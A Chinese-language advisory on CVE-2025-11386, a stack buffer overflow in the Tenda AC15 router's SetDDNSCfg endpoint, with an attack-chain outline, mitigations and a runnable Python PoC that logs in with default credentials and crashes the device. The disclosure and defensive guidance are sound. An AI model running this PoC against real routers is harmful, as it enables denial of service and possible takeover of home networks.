CVE-2025-11386：Tenda AC15路由器SetDDNSCfg接口栈缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-11386

漏洞类型

栈缓冲区溢出（Stack-based Buffer Overflow）

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC15 路由器固件

漏洞概述

CVE-2025-11386是Tenda AC15路由器固件（版本15.03.05.18）中存在的一个高危安全漏洞。该漏洞位于路由器的/goform/SetDDNSCfg接口的POST参数处理器中，具体涉及对ddnsEn参数的处理逻辑存在缺陷。攻击者可通过构造恶意的POST请求，向该接口提交超长或格式异常的ddnsEn参数值，触发栈缓冲区溢出漏洞。

该漏洞的CVSS 3.1评分为8.8分，属于高危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），仅需低权限认证（PR:L），无需用户交互（UI:N）。一旦漏洞被成功利用，攻击者可在受影响的设备上执行任意代码，从而完全控制路由器设备。

由于路由器作为网络的关键基础设施设备，一旦被攻陷，攻击者可利用其进行网络流量劫持、DNS劫持、内网渗透、植入后门等进一步攻击活动，对用户网络安全和隐私构成严重威胁。该漏洞的利用代码已公开披露，进一步增加了被恶意利用的风险。受影响的Tenda AC15路由器广泛应用于家庭和小型办公网络环境，影响范围较大。

技术细节

该漏洞的根本原因在于Tenda AC15路由器固件（15.03.05.18）的/goform/SetDDNSCfg接口在处理POST请求中的ddnsEn参数时，未对用户输入的数据长度进行充分的边界检查。当攻击者向该接口发送包含超长ddnsEn参数值的POST请求时，数据将被复制到固定大小的栈缓冲区中，导致栈缓冲区溢出。

从技术层面分析，该漏洞的利用流程如下：
1. 攻击者首先需要获取路由器的低权限认证凭据（如普通用户账号），这可以通过默认密码或社会工程学手段获得。
2. 构造恶意HTTP POST请求，目标为/goform/SetDDNSCfg接口。
3. 在POST请求体中，将ddnsEn参数设置为超长字符串（通常超过栈缓冲区大小），例如数百或数千字节的填充数据。
4. 精心构造的溢出数据可覆盖栈上的返回地址和关键控制数据。
5. 当被调用的处理函数返回时，程序控制流被劫持到攻击者指定的地址。
6. 攻击者可借此执行任意代码，如启动shell、植入后门、修改路由配置等。

由于该漏洞为栈缓冲区溢出，攻击者还可利用ROP（Return-Oriented Programming）等技术绕过ASLR等安全防护机制，提高利用成功率。固件中可能存在的NX（No-Execute）保护缺失或可执行栈配置，进一步降低了利用难度。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过扫描互联网或局域网，识别运行Tenda AC15固件15.03.05.18的路由器设备，确定目标设备的IP地址和管理端口。

STEP 2

步骤2：获取认证凭据

攻击者通过默认密码、社会工程学、暴力破解或其他方式获取路由器的低权限认证账号（如普通用户账号）。

STEP 3

步骤3：构造恶意请求

攻击者构造包含超长ddnsEn参数值的HTTP POST请求，目标为/goform/SetDDNSCfg接口，载荷长度超过栈缓冲区大小。

STEP 4

步骤4：触发缓冲区溢出

发送恶意POST请求到目标路由器，ddnsEn参数的超长数据溢出栈缓冲区，覆盖返回地址和控制数据。

STEP 5

步骤5：劫持控制流

当处理函数返回时，程序控制流被劫持到攻击者指定的地址，利用ROP链或shellcode执行任意代码。

STEP 6

步骤6：设备控制与持久化

攻击者在路由器上执行任意代码，获取设备完全控制权，植入后门，修改DNS设置或进行内网渗透等后续攻击活动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2025-11386 - Tenda AC15 SetDDNSCfg Stack-based Buffer Overflow PoC
Author: Security Researcher
Description: This PoC demonstrates the stack-based buffer overflow vulnerability
             in Tenda AC15 router firmware version 15.03.05.18.
             The vulnerability exists in the /goform/SetDDNSCfg endpoint
             where the 'ddnsEn' POST parameter is not properly bounds-checked.
"""

import requests
import sys

# Target router configuration
TARGET_HOST = "http://192.168.0.1"  # Default Tenda router IP
LOGIN_URL = f"{TARGET_HOST}/login/Auth"
TARGET_URL = f"{TARGET_HOST}/goform/SetDDNSCfg"

# Default credentials (replace with valid ones if changed)
USERNAME = "admin"
PASSWORD = "admin"  # or try common defaults like "password", "1234"

# Buffer overflow payload - oversized 'ddnsEn' parameter
# The original buffer size is typically small; we overflow with a large string
OVERFLOW_SIZE = 1024  # Adjust size based on target
PAYLOAD = "A" * OVERFLOW_SIZE

def exploit():
    session = requests.Session()

    # Step 1: Authenticate with the router
    print("[*] Attempting authentication...")
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    try:
        resp = session.post(LOGIN_URL, data=login_data, timeout=10)
        print(f"[*] Login response status: {resp.status_code}")
    except Exception as e:
        print(f"[-] Login failed: {e}")
        sys.exit(1)

    # Step 2: Send malicious POST request with oversized ddnsEn parameter
    print(f"[*] Sending exploit payload to {TARGET_URL}")
    exploit_data = {
        "ddnsEn": PAYLOAD,  # Oversized parameter triggers stack overflow
        "ddnsServer": "no-ip.com",
        "ddnsUser": "test",
        "ddnsPwd": "test",
        "ddnsDomain": "test.ddns.net"
    }

    try:
        resp = session.post(TARGET_URL, data=exploit_data, timeout=10)
        print(f"[*] Exploit response status: {resp.status_code}")
        print(f"[*] Response body: {resp.text[:200]}")
    except requests.exceptions.Timeout:
        print("[+] Target may have crashed - possible successful exploitation!")
    except Exception as e:
        print(f"[-] Request error: {e}")

    # Step 3: Check if the service is still alive
    print("[*] Checking target availability...")
    try:
        resp = session.get(TARGET_HOST, timeout=5)
        print(f"[*] Target status: {resp.status_code} (still alive)")
    except Exception:
        print("[+] Target appears to be down - exploit may have succeeded!")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_HOST = sys.argv[1]
    exploit()

影响范围

Tenda AC15 固件版本 15.03.05.18

防御指南

临时缓解措施

在等待官方补丁发布之前，建议采取以下临时缓解措施：1）立即修改路由器默认管理密码，使用强密码策略；2）限制路由器管理界面的网络访问范围，仅允许可信内网IP访问；3）关闭远程管理功能，避免从互联网直接访问路由器管理界面；4）部署网络入侵检测系统（NIDS）监控针对/goform/SetDDNSCfg接口的异常POST请求；5）定期检查路由器日志，及时发现可疑活动；6）考虑使用WAF（Web应用防火墙）规则过滤超长ddnsEn参数的恶意请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11386
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11386
3 Details https://www.cvedetails.com/cve/CVE-2025-11386/
4 VulDB https://vuldb.com/cve/CVE-2025-11386
5 Link https://github.com/noahze01/IoT-vulnerable/blob/main/Tenda/AC15/SetDDNSCfg.md
6 Link https://vuldb.com/?ctiid.327313
7 Link https://vuldb.com/?id.327313
8 Link https://vuldb.com/?submit.664969
9 Link https://www.tenda.com.cn/